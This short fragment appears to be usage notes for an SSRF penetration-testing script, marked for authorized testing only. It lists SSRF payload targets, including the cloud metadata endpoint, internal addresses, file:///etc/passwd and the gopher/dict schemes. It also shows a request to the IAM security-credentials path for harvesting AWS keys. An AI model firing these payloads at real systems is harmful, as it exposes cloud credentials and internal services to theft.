pip install requests
http://169.254.169.254/latest/meta-data/
http://127.0.0.1:port/, http://10.0.0.1/
file:///etc/passwd, gopher://, dict://
# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.